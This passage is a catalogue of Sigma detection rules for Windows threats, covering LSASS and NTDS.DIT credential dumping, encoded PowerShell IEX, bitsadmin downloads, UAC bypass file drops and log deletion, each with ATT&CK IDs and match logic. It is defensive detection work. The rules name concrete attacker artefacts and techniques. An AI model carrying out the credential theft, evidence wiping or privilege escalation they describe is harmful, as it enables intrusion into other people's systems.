- python3 -h
- wget --help
selection_webserver_characteristics_tomcat1:
ParentImage|contains:
- -tomcat-
- \tomcat
ParentImage|endswith:
- \java.exe
- \javaw.exe
selection_webserver_characteristics_tomcat2:
CommandLine|contains:
- CATALINA_HOME
- catalina.jar
ParentImage|endswith:
- \java.exe
- \javaw.exe
selection_webserver_image:
ParentImage|endswith:
- \caddy.exe
- \httpd.exe
- \nginx.exe
- \php-cgi.exe
- \w3wp.exe
- \ws_tomcatservice.exe
Suspicious Parent Double Extension File Execution
- source: sigma
- technicques:
- t1036
- t1036.007
Description
Detect execution of suspicious double extension files in ParentCommandLine
Detection logic
condition: selection
selection:
- ParentImage|endswith:
- .doc.lnk
- .docx.lnk
- .xls.lnk
- .xlsx.lnk
- .ppt.lnk
- .pptx.lnk
- .rtf.lnk
- .pdf.lnk
- .txt.lnk
- .doc.js
- .docx.js
- .xls.js
- .xlsx.js
- .ppt.js
- .pptx.js
- .rtf.js
- .pdf.js
- .txt.js
- ParentCommandLine|contains:
- .doc.lnk
- .docx.lnk
- .xls.lnk
- .xlsx.lnk
- .ppt.lnk
- .pptx.lnk
- .rtf.lnk
- .pdf.lnk
- .txt.lnk
- .doc.js
- .docx.js
- .xls.js
- .xlsx.js
- .ppt.js
- .pptx.js
- .rtf.js
- .pdf.js
- .txt.js
Suspicious Rundll32 Activity Invoking Sys File
- source: sigma
- technicques:
- t1218
- t1218.011
Description
Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452
Detection logic
condition: all of selection*
selection1:
CommandLine|contains: rundll32.exe
selection2:
CommandLine|contains:
- .sys,
- '.sys '
Invoke-Obfuscation Via Stdin
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated Powershell via Stdin in Scripts
Detection logic
condition: selection
selection:
CommandLine|re: (?i)(set).*&&\s?set.*(environment|invoke|\$\{?input).*&&.*"
PowerShell Base64 Encoded IEX Cmdlet
- source: sigma
- technicques:
- t1059
- t1059.001
Description
Detects usage of a base64 encoded “IEX” cmdlet in a process command line
Detection logic
condition: selection
selection:
- CommandLine|base64offset|contains:
- IEX ([
- iex ([
- iex (New
- IEX (New
- IEX([
- iex([
- iex(New
- IEX(New
- IEX(('
- iex(('
- CommandLine|contains:
- SQBFAFgAIAAoAFsA
- kARQBYACAAKABbA
- JAEUAWAAgACgAWw
- aQBlAHgAIAAoAFsA
- kAZQB4ACAAKABbA
- pAGUAeAAgACgAWw
- aQBlAHgAIAAoAE4AZQB3A
- kAZQB4ACAAKABOAGUAdw
- pAGUAeAAgACgATgBlAHcA
- SQBFAFgAIAAoAE4AZQB3A
- kARQBYACAAKABOAGUAdw
- JAEUAWAAgACgATgBlAHcA
Malicious Base64 Encoded PowerShell Keywords in Command Lines
- source: sigma
- technicques:
- t1059
- t1059.001
Description
Detects base64 encoded strings used in hidden malicious PowerShell command lines
Detection logic
condition: all of selection_*
selection_encoded:
CommandLine|contains:
- AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA
- aXRzYWRtaW4gL3RyYW5zZmVy
- IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA
- JpdHNhZG1pbiAvdHJhbnNmZX
- YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg
- Yml0c2FkbWluIC90cmFuc2Zlc
- AGMAaAB1AG4AawBfAHMAaQB6AGUA
- JABjAGgAdQBuAGsAXwBzAGkAegBlA
- JGNodW5rX3Npem
- QAYwBoAHUAbgBrAF8AcwBpAHoAZQ
- RjaHVua19zaXpl
- Y2h1bmtfc2l6Z
- AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A
- kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg
- lPLkNvbXByZXNzaW9u
- SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA
- SU8uQ29tcHJlc3Npb2
- Ty5Db21wcmVzc2lvb
- AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ
- kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA
- lPLk1lbW9yeVN0cmVhb
- SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A
- SU8uTWVtb3J5U3RyZWFt
- Ty5NZW1vcnlTdHJlYW
- 4ARwBlAHQAQwBoAHUAbgBrA
- 5HZXRDaHVua
- AEcAZQB0AEMAaAB1AG4Aaw
- LgBHAGUAdABDAGgAdQBuAGsA
- LkdldENodW5r
- R2V0Q2h1bm
- AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A
- QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA
- RIUkVBRF9JTkZPNj
- SFJFQURfSU5GTzY0
- VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA
- VEhSRUFEX0lORk82N
- AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA
- cmVhdGVSZW1vdGVUaHJlYW
- MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA
- NyZWF0ZVJlbW90ZVRocmVhZ
- Q3JlYXRlUmVtb3RlVGhyZWFk
- QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA
- 0AZQBtAG0AbwB2AGUA
- 1lbW1vdm
- AGUAbQBtAG8AdgBlA
- bQBlAG0AbQBvAHYAZQ
- bWVtbW92Z
- ZW1tb3Zl
selection_hidden:
CommandLine|contains: ' hidden '
selection_img:
- Image|endswith:
- \powershell.exe
- \pwsh.exe
- OriginalFileName:
- PowerShell.EXE
- pwsh.dll
File Download Via Bitsadmin To An Uncommon Target Folder
- source: sigma
- technicques:
- t1036
- t1036.003
- t1197
Description
Detects usage of bitsadmin downloading a file to uncommon target folder
Detection logic
condition: all of selection_*
selection_flags:
CommandLine|contains:
- ' /transfer '
- ' /create '
- ' /addfile '
selection_folder:
CommandLine|contains:
- '%AppData%'
- '%temp%'
- '%tmp%'
- \AppData\Local\
- C:\Windows\Temp\
selection_img:
- Image|endswith: \bitsadmin.exe
- OriginalFileName: bitsadmin.exe
Wab Execution From Non Default Location
- source: sigma
- technicques:
Description
Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity
Detection logic
condition: selection and not filter
filter:
Image|startswith:
- C:\Windows\WinSxS\
- C:\Program Files\Windows Mail\
- C:\Program Files (x86)\Windows Mail\
selection:
Image|endswith:
- \wab.exe
- \wabmig.exe
Potential Tampering With RDP Related Registry Keys Via Reg.EXE
- source: sigma
- technicques:
- t1021
- t1021.001
- t1112
Description
Detects the execution of “reg.exe” for enabling/disabling the RDP service on the host by tampering with the ‘CurrentControlSet\Control\Terminal Server’ values
Detection logic
condition: all of selection_main_* and 1 of selection_values_*
selection_main_cli:
CommandLine|contains|all:
- ' add '
- \CurrentControlSet\Control\Terminal Server
- REG_DWORD
- ' /f'
selection_main_img:
- Image|endswith: \reg.exe
- OriginalFileName: reg.exe
selection_values_1:
CommandLine|contains|all:
- Licensing Core
- EnableConcurrentSessions
selection_values_2:
CommandLine|contains:
- WinStations\RDP-Tcp
- MaxInstanceCount
- fEnableWinStation
- TSUserEnabled
- TSEnabled
- TSAppCompat
- IdleWinStationPoolCount
- TSAdvertise
- AllowTSConnections
- fSingleSessionPerUser
- fDenyTSConnections
WMIC Remote Command Execution
- source: sigma
- technicques:
- t1047
Description
Detects the execution of WMIC to query information on a remote system
Detection logic
condition: all of selection_* and not 1 of filter_*
filter_localhost:
CommandLine|contains:
- '/node:127.0.0.1 '
- '/node:localhost '
selection_cli:
CommandLine|contains: '/node:'
selection_img:
- Image|endswith: \WMIC.exe
- OriginalFileName: wmic.exe
HackTool - WinRM Access Via Evil-WinRM
- source: sigma
- technicques:
- t1021
- t1021.006
Description
Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Detection logic
condition: 1 of selection_*
selection_mstsc:
CommandLine|contains|all:
- '-i '
- '-u '
- '-p '
Image|endswith: \ruby.exe
Suspicious Diantz Download and Compress Into a CAB File
- source: sigma
- technicques:
- t1105
Description
Download and compress a remote file and store it in a cab file on local machine.
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- diantz.exe
- ' \\\\'
- .cab
Permission Misconfiguration Reconnaissance Via Findstr.EXE
- source: sigma
- technicques:
- t1552
- t1552.006
Description
Detects usage of findstr with the “EVERYONE” or “BUILTIN” keywords. This is seen being used in combination with “icacls” to look for misconfigured files or folders permissions
Detection logic
condition: all of selection_findstr_* or selection_special
selection_findstr_cli:
CommandLine|contains:
- '"Everyone"'
- '''Everyone'''
- '"BUILTIN\\"'
- '''BUILTIN\'''
selection_findstr_img:
- Image|endswith:
- \find.exe
- \findstr.exe
- OriginalFileName:
- FIND.EXE
- FINDSTR.EXE
selection_special:
CommandLine|contains|all:
- 'icacls '
- 'findstr '
- Everyone
Tasks Folder Evasion
- source: sigma
- technicques:
- t1574
- t1574.002
Description
The Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr
Detection logic
condition: all of selection*
selection1:
CommandLine|contains:
- 'echo '
- 'copy '
- 'type '
- file createnew
selection2:
CommandLine|contains:
- ' C:\Windows\System32\Tasks\'
- ' C:\Windows\SysWow64\Tasks\'
Write Protect For Storage Disabled
- source: sigma
- technicques:
- t1562
Description
Detects applications trying to modify the registry in order to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- \System\CurrentControlSet\Control
- Write Protection
- '0'
- storage
Potential Obfuscated Ordinal Call Via Rundll32
- source: sigma
- technicques:
Description
Detects execution of “rundll32” with potential obfuscated ordinal calls
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains:
- '#+'
- '#-'
selection_img:
- Image|endswith: \rundll32.exe
- OriginalFileName: RUNDLL32.EXE
- CommandLine|contains: rundll32
Exchange PowerShell Snap-Ins Usage
- source: sigma
- technicques:
- t1059
- t1059.001
- t1114
Description
Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27
Detection logic
condition: all of selection_* and not 1 of filter_*
filter_msiexec:
CommandLine|contains: $exserver=Get-ExchangeServer ([Environment]::MachineName)
-ErrorVariable exerr 2> $null
ParentImage: C:\Windows\System32\msiexec.exe
selection_cli:
CommandLine|contains: Add-PSSnapin
selection_img:
- Image|endswith:
- \powershell.exe
- \pwsh.exe
- OriginalFileName:
- PowerShell.EXE
- pwsh.dll
selection_module:
CommandLine|contains:
- Microsoft.Exchange.Powershell.Snapin
- Microsoft.Exchange.Management.PowerShell.SnapIn
Arbitrary File Download Via MSEDGE_PROXY.EXE
- source: sigma
- technicques:
- t1218
Description
Detects usage of “msedge_proxy.exe” to download arbitrary files
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains:
- http://
- https://
selection_img:
- Image|endswith: \msedge_proxy.exe
- OriginalFileName: msedge_proxy.exe
Suspicious Process Patterns NTDS.DIT Exfil
- source: sigma
- technicques:
- t1003
- t1003.003
Description
Detects suspicious process patterns used in NTDS.DIT exfiltration
Detection logic
condition: 1 of selection* or all of set1*
selection_oneliner_1:
CommandLine|contains|all:
- ac i ntds
- create full
selection_onliner_2:
CommandLine|contains|all:
- '/c copy '
- \windows\ntds\ntds.dit
selection_onliner_3:
CommandLine|contains|all:
- activate instance ntds
- create full
selection_powershell:
CommandLine|contains|all:
- powershell
- ntds.dit
selection_tool:
- Image|endswith:
- \NTDSDump.exe
- \NTDSDumpEx.exe
- CommandLine|contains|all:
- ntds.dit
- system.hiv
- CommandLine|contains: NTDSgrab.ps1
set1_selection_image_folder:
- ParentImage|contains:
- \apache
- \tomcat
- \AppData\
- \Temp\
- \Public\
- \PerfLogs\
- Image|contains:
- \apache
- \tomcat
- \AppData\
- \Temp\
- \Public\
- \PerfLogs\
set1_selection_ntds_dit:
CommandLine|contains: ntds.dit
Veeam Backup Database Suspicious Query
- source: sigma
- technicques:
- t1005
Description
Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information.
Detection logic
condition: all of selection_*
selection_db:
CommandLine|contains:
- BackupRepositories
- Backups
- Credentials
- HostCreds
- SmbFileShares
- Ssh_creds
- VSphereInfo
selection_sql:
CommandLine|contains|all:
- VeeamBackup
- 'From '
Image|endswith: \sqlcmd.exe
Browser Started with Remote Debugging
- source: sigma
- technicques:
- t1185
Description
Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks
Detection logic
condition: 1 of selection_*
selection_chromium_based:
CommandLine|contains: ' --remote-debugging-'
selection_firefox:
CommandLine|contains: ' -start-debugger-server'
Image|endswith: \firefox.exe
Security Tools Keyword Lookup Via Findstr.EXE
- source: sigma
- technicques:
- t1518
- t1518.001
Description
Detects execution of “findstr” to search for common names of security tools. Attackers often pipe the results of recon commands such as “tasklist” or “whoami” to “findstr” in order to filter out the results. This detection focuses on the keywords that the attacker might use as a filter.
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|endswith:
- ' avira'
- ' avira"'
- ' cb'
- ' cb"'
- ' cylance'
- ' cylance"'
- ' defender'
- ' defender"'
- ' kaspersky'
- ' kaspersky"'
- ' kes'
- ' kes"'
- ' mc'
- ' mc"'
- ' sec'
- ' sec"'
- ' sentinel'
- ' sentinel"'
- ' symantec'
- ' symantec"'
- ' virus'
- ' virus"'
selection_img:
- Image|endswith:
- \find.exe
- \findstr.exe
- OriginalFileName:
- FIND.EXE
- FINDSTR.EXE
Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE
- source: sigma
- technicques:
Description
Detects usage of the copy builtin cmd command to copy files with the “.dmp”/".dump” extension from a remote share
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains:
- .dmp
- .dump
- .hdmp
CommandLine|contains|all:
- 'copy '
- ' \\\\'
selection_img:
- Image|endswith: \cmd.exe
- OriginalFileName: Cmd.Exe
Potential PrintNightmare Exploitation Attempt
- source: sigma
- technicques:
- t1574
Description
Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675
Detection logic
condition: selection
selection:
Image|endswith: \spoolsv.exe
TargetFilename|contains: C:\Windows\System32\spool\drivers\x64\3\
Prefetch File Deleted
- source: sigma
- technicques:
- t1070
- t1070.004
Description
Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_svchost:
Image|endswith: :\windows\system32\svchost.exe
User|contains:
- AUTHORI
- AUTORI
selection:
TargetFilename|contains: :\Windows\Prefetch\
TargetFilename|endswith: .pf
Unusual File Deletion by Dns.exe
- source: sigma
- technicques:
- t1133
Description
Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
Detection logic
condition: selection and not filter
filter:
TargetFilename|endswith: \dns.log
selection:
Image|endswith: \dns.exe
PowerShell Console History Logs Deleted
- source: sigma
- technicques:
- t1070
Description
Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence
Detection logic
condition: selection
selection:
TargetFilename|endswith: \PSReadLine\ConsoleHost_history.txt
TeamViewer Log File Deleted
- source: sigma
- technicques:
- t1070
- t1070.004
Description
Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence
Detection logic
condition: selection and not filter
filter:
Image: C:\Windows\system32\svchost.exe
selection:
TargetFilename|contains: \TeamViewer_
TargetFilename|endswith: .log
EventLog EVTX File Deleted
- source: sigma
- technicques:
- t1070
Description
Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence
Detection logic
condition: selection
selection:
TargetFilename|endswith: .evtx
TargetFilename|startswith: C:\Windows\System32\winevt\Logs\
Potential Remote Credential Dumping Activity
- source: sigma
- technicques:
- t1003
Description
Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.
Detection logic
condition: selection
selection:
Image|endswith: \svchost.exe
TargetFilename|re: \\Windows\\System32\\[a-zA-Z0-9]{8}\.tmp$
Wmiprvse Wbemcomn DLL Hijack - File
- source: sigma
- technicques:
- t1021
- t1021.002
- t1047
Description
Detects a threat actor creating a file named wbemcomn.dll in the C:\Windows\System32\wbem\ directory over the network and loading it for a WMI DLL Hijack scenario.
Detection logic
condition: selection
selection:
Image: System
TargetFilename|endswith: \wbem\wbemcomn.dll
GatherNetworkInfo.VBS Reconnaissance Script Output
- source: sigma
- technicques:
Description
Detects creation of files which are the results of executing the built-in reconnaissance script “C:\Windows\System32\gatherNetworkInfo.vbs”.
Detection logic
condition: selection
selection:
TargetFilename|endswith:
- \Hotfixinfo.txt
- \netiostate.txt
- \sysportslog.txt
- \VmSwitchLog.evtx
TargetFilename|startswith: C:\Windows\System32\config
NTDS.DIT Creation By Uncommon Parent Process
- source: sigma
- technicques:
- t1003
- t1003.003
Description
Detects creation of a file named “ntds.dit” (Active Directory Database) by an uncommon parent process or directory
Detection logic
condition: selection_file and 1 of selection_process_*
selection_file:
TargetFilename|endswith: \ntds.dit
selection_process_parent:
ParentImage|endswith:
- \cscript.exe
- \httpd.exe
- \nginx.exe
- \php-cgi.exe
- \powershell.exe
- \pwsh.exe
- \w3wp.exe
- \wscript.exe
selection_process_parent_path:
ParentImage|contains:
- \apache
- \tomcat
- \AppData\
- \Temp\
- \Public\
- \PerfLogs\
UAC Bypass Using NTFS Reparse Point - File
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
Detection logic
condition: selection
selection:
TargetFilename|endswith: \AppData\Local\Temp\api-ms-win-core-kernel32-legacy-l1.DLL
TargetFilename|startswith: C:\Users\
Windows Binaries Write Suspicious Extensions
- source: sigma
- technicques:
- t1036
Description
Detects Windows executables that write files with suspicious extensions
Detection logic
condition: 1 of selection_* and not 1 of filter_main_*
filter_main_AppLockerPolicyTest:
Image: C:\Windows\System32\dllhost.exe
TargetFilename|contains|all:
- :\Users\
- \AppData\Local\Temp\__PSScriptPolicyTest_
TargetFilename|endswith: .ps1
filter_main_script_gpo_machine:
Image: C:\Windows\system32\svchost.exe
TargetFilename|contains|all:
- C:\Windows\System32\GroupPolicy\DataStore\
- \sysvol\
- \Policies\
- \Machine\Scripts\Startup\
TargetFilename|endswith:
- .ps1
- .bat
selection_generic:
Image|endswith:
- \csrss.exe
- \lsass.exe
- \RuntimeBroker.exe
- \sihost.exe
- \smss.exe
- \wininit.exe
- \winlogon.exe
TargetFilename|endswith:
- .bat
- .dll
- .exe
- .hta
- .iso
- .ps1
- .txt
- .vbe
- .vbs
selection_special:
Image|endswith:
- \dllhost.exe
- \rundll32.exe
- \svchost.exe
TargetFilename|endswith:
- .bat
- .hta
- .iso
- .ps1
- .vbe
- .vbs
Suspicious Scheduled Task Write to System32 Tasks
- source: sigma
- technicques:
- t1053
Description
Detects the creation of tasks from processes executed from suspicious locations
Detection logic
condition: selection
selection:
Image|contains:
- \AppData\
- C:\PerfLogs
- \Windows\System32\config\systemprofile
TargetFilename|contains: \Windows\System32\Tasks
Suspicious Files in Default GPO Folder
- source: sigma
- technicques:
- t1036
- t1036.005
Description
Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder
Detection logic
condition: selection
selection:
TargetFilename|contains: \Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\
TargetFilename|endswith:
- .dll
- .exe
Potential RipZip Attack on Startup Folder
- source: sigma
- technicques:
- t1547
Description
Detects a phishing attack which expands a ZIP file containing a malicious shortcut. If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder. Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.
Detection logic
condition: selection
selection:
Image|endswith: \explorer.exe
TargetFilename|contains|all:
- \Microsoft\Windows\Start Menu\Programs\Startup
- .lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}
Legitimate Application Dropped Executable
- source: sigma
- technicques:
- t1218
Description
Detects programs on a Windows system that should not write executables to disk
Detection logic
condition: selection
selection:
Image|endswith:
- \eqnedt32.exe
- \wordpad.exe
- \wordview.exe
- \certutil.exe
- \certoc.exe
- \CertReq.exe
- \Desktopimgdownldr.exe
- \esentutl.exe
- \mshta.exe
- \AcroRd32.exe
- \RdrCEF.exe
- \hh.exe
- \finger.exe
TargetFilename|endswith:
- .exe
- .dll
- .ocx
UAC Bypass Using .NET Code Profiler on MMC
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)
Detection logic
condition: selection
selection:
TargetFilename|endswith: \AppData\Local\Temp\pe386.dll
TargetFilename|startswith: C:\Users\
UAC Bypass Abusing Winsat Path Parsing - File
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
Detection logic
condition: selection
selection:
TargetFilename|endswith:
- \AppData\Local\Temp\system32\winsat.exe
- \AppData\Local\Temp\system32\winmm.dll
TargetFilename|startswith: C:\Users\
PsExec Service File Creation
- source: sigma
- technicques:
- t1569
- t1569.002
Description
Detects default PsExec service filename which indicates PsExec service installation and execution
Detection logic
condition: selection
selection:
TargetFilename|endswith: \PSEXESVC.exe
Legitimate Application Dropped Script
- source: sigma
- technicques:
- t1218
Description
Detects programs on a Windows system that should not write scripts to disk
Detection logic
condition: selection
selection:
Image|endswith:
- \eqnedt32.exe
- \wordpad.exe
- \wordview.exe
- \certutil.exe
- \certoc.exe
- \CertReq.exe
- \Desktopimgdownldr.exe
- \esentutl.exe
- \mshta.exe
- \AcroRd32.exe
- \RdrCEF.exe
- \hh.exe
- \finger.exe
TargetFilename|endswith:
- .ps1
- .bat
- .vbs
- .scf
- .wsf
- .wsh
Suspicious File Drop by Exchange
- source: sigma
- technicques:
- t1190
- t1505
- t1505.003
Description
Detects suspicious file type dropped by an Exchange component in IIS
Detection logic
condition: all of selection*
selection:
CommandLine|contains: MSExchange
Image|endswith: \w3wp.exe
selection_types:
TargetFilename|endswith:
- .aspx
- .asp
- .ashx
- .ps1
- .bat
- .exe
- .dll
- .vbs
Octopus Scanner Malware
- source: sigma
- technicques:
- t1195
- t1195.001
Description
Detects Octopus Scanner Malware.
Detection logic
condition: selection
selection:
TargetFilename|endswith:
- \AppData\Local\Microsoft\Cache134.dat
- \AppData\Local\Microsoft\ExplorerSync.db
Creation of an WerFault.exe in Unusual Folder
- source: sigma
- technicques:
- t1574
- t1574.001
Description
Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking
Detection logic
condition: selection and not filter_whitelist
filter_whitelist:
TargetFilename|contains:
- \System32\
- \SysWOW64\
- \WinSxS\
selection:
TargetFilename|endswith:
- \WerFault.exe
- \wer.dll
Suspicious Get-Variable.exe Creation
- source: sigma
- technicques:
- t1027
- t1546
Description
Get-Variable is a valid PowerShell cmdlet WindowsApps is by default in the path where PowerShell is executed. So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.
Detection logic
condition: selection
selection:
TargetFilename|endswith: Local\Microsoft\WindowsApps\Get-Variable.exe
Creation Exe for Service with Unquoted Path
- source: sigma
- technicques:
- t1547
- t1547.009
Description
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary’s executable to launch.
Detection logic
condition: selection
selection:
TargetFilename: C:\program.exe
Potential DCOM InternetExplorer.Application DLL Hijack
- source: sigma
- technicques:
- t1021
- t1021.002
- t1021.003
Description
Detects potential DLL hijack of “iertutil.dll” found in the DCOM InternetExplorer.Application Class over the network
Detection logic
condition: selection
selection:
Image: System
TargetFilename|endswith: \Internet Explorer\iertutil.dll
Suspicious Executable File Creation
- source: sigma
- technicques:
- t1564
Description
Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.
Detection logic
condition: 1 of selection_*
selection_double:
TargetFilename|endswith:
- :\$Recycle.Bin.exe
- :\Documents and Settings.exe
- :\MSOCache.exe
- :\PerfLogs.exe
- :\Recovery.exe
- .bat.exe
- .sys.exe
File Creation In Suspicious Directory By Msdt.EXE
- source: sigma
- technicques:
- t1547
- t1547.001
Description
Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities
Detection logic
condition: selection
selection:
Image|endswith: \msdt.exe
TargetFilename|contains:
- \Desktop\
- \Start Menu\Programs\Startup\
- C:\PerfLogs\
- C:\ProgramData\
- C:\Users\Public\
LSASS Process Memory Dump Files
- source: sigma
- technicques:
- t1003
- t1003.001
Description
Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.
Detection logic
condition: 1 of selection_*
selection_1:
TargetFilename|endswith:
- \lsass.dmp
- \lsass.zip
- \lsass.rar
- \Andrew.dmp
- \Coredump.dmp
- \NotLSASS.zip
- \PPLBlade.dmp
selection_2:
TargetFilename|contains:
- \lsass_2
- \lsassdump
- \lsassdmp
selection_3:
TargetFilename|contains|all:
- \lsass
- .dmp
selection_4:
TargetFilename|contains: SQLDmpr
TargetFilename|endswith: .mdmp
selection_5:
TargetFilename|endswith: .dmp
TargetFilename|startswith: nanodump
QuarksPwDump Dump File
- source: sigma
- technicques:
- t1003
- t1003.002
Description
Detects a dump file written by QuarksPwDump password dumper
Detection logic
condition: selection
selection:
TargetFilename|contains|all:
- \AppData\Local\Temp\SAM-
- .dmp
WerFault LSASS Process Memory Dump
- source: sigma
- technicques:
- t1003
- t1003.001
Description
Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials
Detection logic
condition: selection
selection:
Image: C:\WINDOWS\system32\WerFault.exe
TargetFilename|contains:
- \lsass
- lsass.exe
WScript or CScript Dropper - File
- source: sigma
- technicques:
- t1059
- t1059.005
- t1059.007
Description
Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe
Detection logic
condition: selection
selection:
Image|endswith:
- \wscript.exe
- \cscript.exe
TargetFilename|endswith:
- .jse
- .vbe
- .js
- .vba
- .vbs
TargetFilename|startswith:
- C:\Users\
- C:\ProgramData
Suspicious Screensaver Binary File Creation
- source: sigma
- technicques:
- t1546
- t1546.002
Description
Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension
Detection logic
condition: selection and not 1 of filter_*
filter_generic:
Image|endswith:
- \Kindle.exe
- \Bin\ccSvcHst.exe
filter_tiworker:
Image|endswith: \TiWorker.exe
TargetFilename|endswith: \uwfservicingscr.scr
selection:
TargetFilename|endswith: .scr
PCRE.NET Package Temp Files
- source: sigma
- technicques:
- t1059
Description
Detects processes creating temp files related to PCRE.NET package
Detection logic
condition: selection
selection:
TargetFilename|contains: \AppData\Local\Temp\ba9ea7344a4a5f591d6e5dc32a13494b\
Visual Studio Code Tunnel Remote File Creation
- source: sigma
- technicques:
Description
Detects the creation of file by the “node.exe” process in the “.vscode-server” directory. Could be a sign of remote file creation via VsCode tunnel feature
Detection logic
condition: selection
selection:
Image|contains: \servers\Stable-
Image|endswith: \server\node.exe
TargetFilename|contains: \.vscode-server\data\User\History\
Potential Persistence Attempt Via ErrorHandler.Cmd
- source: sigma
- technicques:
Description
Detects creation of a file named “ErrorHandler.cmd” in the “C:\WINDOWS\Setup\Scripts" directory which could be used as a method of persistence The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason.
Detection logic
condition: selection
selection:
TargetFilename|endswith: \WINDOWS\Setup\Scripts\ErrorHandler.cmd
Windows Shell/Scripting Application File Write to Suspicious Folder
- source: sigma
- technicques:
- t1059
Description
Detects Windows shells and scripting applications that write files to suspicious folders
Detection logic
condition: 1 of selection_*
selection_1:
Image|endswith:
- \bash.exe
- \cmd.exe
- \cscript.exe
- \msbuild.exe
- \powershell.exe
- \pwsh.exe
- \sh.exe
- \wscript.exe
TargetFilename|startswith:
- C:\PerfLogs\
- C:\Users\Public\
selection_2:
Image|endswith:
- \certutil.exe
- \forfiles.exe
- \mshta.exe
- \schtasks.exe
- \scriptrunner.exe
- \wmic.exe
TargetFilename|contains:
- C:\PerfLogs\
- C:\Users\Public\
- C:\Windows\Temp\
Suspicious Binary Writes Via AnyDesk
- source: sigma
- technicques:
- t1219
Description
Detects AnyDesk writing binary files to disk other than “gcapi.dll”. According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll, which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)
Detection logic
condition: selection and not 1 of filter_*
filter_dlls:
TargetFilename|endswith: \gcapi.dll
selection:
Image|endswith: \anydesk.exe
TargetFilename|endswith:
- .dll
- .exe
Potential Privilege Escalation Attempt Via .Exe.Local Technique
- source: sigma
- technicques:
Description
Detects potential privilege escalation attempt via the creation of the “*.Exe.Local” folder inside the “System32” directory in order to sideload “comctl32.dll”
Detection logic
condition: selection
selection:
TargetFilename|endswith: \comctl32.dll
TargetFilename|startswith:
- C:\Windows\System32\logonUI.exe.local
- C:\Windows\System32\werFault.exe.local
- C:\Windows\System32\consent.exe.local
